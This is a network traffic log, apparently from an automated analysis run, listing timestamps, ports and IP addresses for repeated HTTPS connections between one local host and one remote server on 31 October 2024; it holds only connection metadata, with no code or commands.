Oct 31, 2024 19:20:08.678082943 CET	51289	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.678097010 CET	443	51289	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.679285049 CET	51290	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.679317951 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.679337025 CET	51290	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.679342985 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.679970026 CET	51288	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.679975986 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.679986954 CET	51288	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.679991007 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.736381054 CET	51291	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.736419916 CET	443	51291	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.736499071 CET	51291	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.738229036 CET	51292	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.738280058 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.738363028 CET	51292	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.738585949 CET	51293	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.738646984 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.739479065 CET	51294	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.739484072 CET	51293	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.739509106 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.740436077 CET	51291	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.740452051 CET	443	51291	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.740489006 CET	51294	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.740611076 CET	51294	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.740629911 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.742686987 CET	51292	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.742717981 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.742734909 CET	51293	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.742762089 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.743855953 CET	51295	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.743870974 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.746068001 CET	51295	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.746294022 CET	51295	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.746310949 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.360078096 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.360790014 CET	51295	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.360831022 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.361129045 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.361291885 CET	51295	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.361299992 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.361401081 CET	51294	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.361416101 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.361629009 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.361747980 CET	51294	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.361752987 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.361879110 CET	51293	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.361888885 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.362394094 CET	51293	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.362400055 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.368352890 CET	443	51291	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.368721962 CET	51291	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.368741989 CET	443	51291	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.369107962 CET	51291	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.369113922 CET	443	51291	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.490057945 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.490267038 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.490334988 CET	51295	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.490467072 CET	51295	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.490493059 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.490506887 CET	51295	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.490514994 CET	443	51295	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.492849112 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.493393898 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.493460894 CET	51293	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.493510008 CET	51293	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.493515968 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.493527889 CET	51293	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.493532896 CET	443	51293	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.493885994 CET	51296	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.493932009 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.494008064 CET	51296	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.494179010 CET	51296	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.494194031 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.495804071 CET	51297	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.495851040 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.495923996 CET	51297	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.496073008 CET	51297	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.496088982 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.498157978 CET	443	51291	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.498397112 CET	443	51291	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.498491049 CET	51291	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.498491049 CET	51291	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.498512030 CET	51291	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.498527050 CET	443	51291	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.500547886 CET	51298	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.500566006 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.500632048 CET	51298	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.500749111 CET	51298	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.500761032 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.507410049 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.507472992 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.507513046 CET	51294	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.507630110 CET	51294	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.507630110 CET	51294	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.507647991 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.507657051 CET	443	51294	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.509531021 CET	51299	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.509541988 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.509617090 CET	51299	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.509744883 CET	51299	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.509758949 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.521615028 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.522104979 CET	51292	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.522119999 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.522567034 CET	51292	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.522572994 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.709908962 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.715560913 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.715620995 CET	51292	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.715703011 CET	51292	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.715703011 CET	51292	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.715720892 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.715724945 CET	443	51292	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.719966888 CET	51300	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.720005989 CET	443	51300	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:10.720087051 CET	51300	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.720225096 CET	51300	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:10.720242023 CET	443	51300	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.222820997 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.223411083 CET	51296	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.223437071 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.223925114 CET	51296	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.223931074 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.252053976 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.252563000 CET	51298	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.252578974 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.253261089 CET	51298	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.253267050 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.253546000 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.253895044 CET	51299	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.253920078 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.254295111 CET	51299	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.254301071 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.254760027 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.255034924 CET	51297	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.255042076 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.255392075 CET	51297	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.255395889 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.350976944 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.351341963 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.351454973 CET	51296	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.351521015 CET	51296	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.351542950 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.351553917 CET	51296	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.351562023 CET	443	51296	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.354871988 CET	51301	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.354913950 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.354995012 CET	51301	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.355134010 CET	51301	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.355149031 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.385147095 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.385442019 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.385462999 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.385643959 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.385649920 CET	51297	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.385741949 CET	51299	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.385741949 CET	51297	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.385741949 CET	51297	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.385759115 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.385768890 CET	443	51297	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.385788918 CET	51299	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.385793924 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.385808945 CET	51299	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.385814905 CET	443	51299	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.386857033 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.386920929 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.386989117 CET	51298	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.387562990 CET	51298	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.387583017 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.387603045 CET	51298	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.387609959 CET	443	51298	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.389347076 CET	51302	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.389381886 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.389466047 CET	51302	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.389652014 CET	51303	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.389693022 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.389744997 CET	51303	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.389930964 CET	51302	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.389940977 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.390070915 CET	51303	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.390089989 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.390304089 CET	51304	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.390369892 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.390439987 CET	51304	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.390577078 CET	51304	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.390588045 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.448538065 CET	443	51300	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.449146986 CET	51300	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.449193954 CET	443	51300	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.449686050 CET	51300	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.449701071 CET	443	51300	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.580316067 CET	443	51300	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.580718040 CET	443	51300	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.580848932 CET	51300	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.580908060 CET	51300	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.580926895 CET	443	51300	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.584165096 CET	51305	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.584202051 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:11.584287882 CET	51305	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.584484100 CET	51305	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:11.584496021 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.131592989 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.132272959 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.132366896 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.132520914 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.134505033 CET	51303	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.134530067 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.134685993 CET	51301	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.134694099 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.135292053 CET	51301	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.135296106 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.135524035 CET	51303	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.135528088 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.135616064 CET	51302	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.135632038 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.136043072 CET	51302	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.136054039 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.136431932 CET	51304	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.136445045 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.136934042 CET	51304	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.136940002 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.262578964 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.262739897 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.262825966 CET	51302	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.262993097 CET	51302	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.263009071 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.263020992 CET	51302	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.263026953 CET	443	51302	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.263108969 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.263180017 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.263225079 CET	51301	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.263339996 CET	51301	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.263339996 CET	51301	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.263355017 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.263365030 CET	443	51301	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.264122963 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.264189005 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.264255047 CET	51304	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.264550924 CET	51304	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.264579058 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.264614105 CET	51304	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.264621973 CET	443	51304	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.266407013 CET	51306	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.266443968 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.266586065 CET	51306	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.266736031 CET	51306	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.266746044 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.267333984 CET	51307	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.267366886 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.267529964 CET	51307	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.267613888 CET	51307	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.267625093 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.267848969 CET	51308	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.267874956 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.268033028 CET	51308	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.268287897 CET	51308	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.268299103 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.355509996 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.356414080 CET	51305	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.356432915 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.357146978 CET	51305	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.357151985 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.465024948 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.465116978 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.465217113 CET	51303	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.470145941 CET	51303	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.470165014 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.470175028 CET	51303	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.470180035 CET	443	51303	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.474718094 CET	51309	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.474762917 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.474821091 CET	51309	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.475033998 CET	51309	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.475047112 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.491611004 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.491708040 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.491751909 CET	51305	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.492017031 CET	51305	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.492029905 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.492096901 CET	51305	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.492101908 CET	443	51305	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.495420933 CET	51310	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.495455980 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:12.495601892 CET	51310	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.495731115 CET	51310	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:12.495742083 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.002228022 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.003124952 CET	51306	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.003139973 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.003748894 CET	51306	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.003756046 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.011406898 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.012095928 CET	51307	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.012123108 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.012641907 CET	51307	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.012650013 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.016928911 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.017422915 CET	51308	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.017446995 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.017909050 CET	51308	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.017915964 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.132080078 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.132369041 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.132472038 CET	51306	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.141957045 CET	51306	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.141973019 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.142019033 CET	51306	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.142034054 CET	443	51306	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.142998934 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.143074989 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.143153906 CET	51307	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.147454023 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.147541046 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.147602081 CET	51308	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.175360918 CET	51307	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.175374031 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.175391912 CET	51307	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.175399065 CET	443	51307	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.178060055 CET	51308	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.178076982 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.178107023 CET	51308	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.178112984 CET	443	51308	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.186824083 CET	51311	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.186861038 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.186928988 CET	51311	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.190311909 CET	51312	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.190335989 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.190696955 CET	51312	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.192156076 CET	51313	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.192183971 CET	443	51313	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.192275047 CET	51313	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.192317963 CET	51311	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.192334890 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.192538977 CET	51312	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.192555904 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.192749023 CET	51313	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.192761898 CET	443	51313	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.223948956 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.224739075 CET	51310	443	192.168.2.4	13.107.246.45
